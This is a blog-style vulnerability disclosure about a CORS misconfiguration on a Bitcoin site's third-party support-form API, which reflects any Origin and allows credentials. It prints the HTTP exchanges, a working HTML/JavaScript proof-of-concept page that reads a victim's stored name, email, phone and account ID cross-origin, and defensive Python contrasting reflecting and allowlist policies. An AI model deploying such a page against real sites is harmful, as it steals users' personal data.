Exploiting Misconfigured CORS on popular BTC Site

Arbaz Hussain
Jul 19, 2017 · 2 min read

Severity: Medium

Complexity : Easy

Weakness : Misconfigured CORS (arbitrary Origin reflected together with Access-Control-Allow-Credentials: true)


On one of the popular BTC sites I was having an issue with my account, so I used their support form to report it.

Details I provided in the form:

  1. Email
  2. Phone number
  3. Name
  4. Message

I clicked Submit and noticed that the form was being sent to a third-party site,

https://api.thirdparty.com/api/contact/widget/281d02/ , as POST data:

POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: REDACTED
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

{"firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9876543210","accountId":"38517","message":"xxx","Tags":[]}


  • After sending the form, I changed the request method to GET,
  • and added Origin: evil.com as a request header:

GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com

  • Response:

Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true

{"contactUid":"025381","firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9123091647","additionalDetails":{},"accountId":38517,"location":null,"Tags":[]}

  • Surprised to see Access-Control-Allow-Credentials: true next to the reflected Origin: the browser will let any page that the victim visits read this response with the victim's cookies attached. The following PoC page demonstrates that:

<html>
<body onload='load()'>
<p id="demo"></p>
Name: <h3 id="name"></h3>
Email: <h3 id="email"></h3>
Phone: <h3 id="phone"></h3>
ACCID: <h3 id="AccountID"></h3>
<h3 id="que"></h3>
<script>
function load(){
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function(){
    if(this.readyState == 4 && this.status == 200){
      // The response body is the stored contact record shown in the GET response above.
      var parsed = JSON.parse(this.responseText);
      console.log(parsed);
      // Read fields by name; the numeric index lookup used originally depended on key order.
      document.getElementById('email').textContent = parsed.email;
      document.getElementById('name').textContent = parsed.firstName;
      document.getElementById('phone').textContent = parsed.phone;
      document.getElementById('AccountID').textContent = parsed.accountId;
    }
  };
  xhr.open("GET", "https://api.thirdparty.com/api/contact/widget/281d02", true);
  // Credentialed request: the browser only attaches the victim's cookies when this is set,
  // and only exposes the response because the server answered Access-Control-Allow-Credentials: true.
  xhr.withCredentials = true;
  xhr.send();
}
</script>
</body>
</html>
  • As soon as the victim (any user who submitted the support form at any time, including on an earlier date) visits the malicious page, the data from their previous form submission is extracted.
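For reference, here is the server-side contrast behind the finding, written for this post as an added illustration (it is not the third-party API's code): the reflecting policy that produced the response above, an allowlist policy that fixes it, and a small classifier that labels a response the way a reviewer would. The origin names and function names are assumptions.

```python
"""CORS response-header policies for the pattern described in this post.

Illustrative code added for this write-up; 'btc.example' and 'evil.example'
are constructed sample origins, not real hosts.
"""


def reflecting_cors(origin: str) -> dict:
    """The weak pattern: echo whatever Origin arrives and allow credentials.
    Any page the victim visits can then read the JSON with the victim's cookies."""
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def allowlist_cors(origin: str, allowed: frozenset) -> dict:
    """Hardened pattern: only an exact, scheme-qualified origin from a fixed
    allowlist gets ACAO plus credentials; everyone else gets no CORS grant.
    'Vary: Origin' stops caches from replaying one origin's grant to another."""
    if origin in allowed:
        return {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",
        }
    return {"Vary": "Origin"}


def assess(origin_sent: str, headers: dict) -> str:
    """Classify the CORS headers of a response to a request that carried an
    arbitrary Origin. 'reflected+credentials' is the finding in this post."""
    acao = headers.get("Access-Control-Allow-Origin")
    acac = headers.get("Access-Control-Allow-Credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        # Browsers refuse credentialed reads under '*', so ACAC adds nothing here.
        return "wildcard"
    if acao == origin_sent:
        return "reflected+credentials" if acac else "reflected"
    return "fixed-origin"
```

Note that browsers send Origin as scheme://host[:port], so an allowlist entry must include the scheme; a substring or suffix match on the host would reopen the hole.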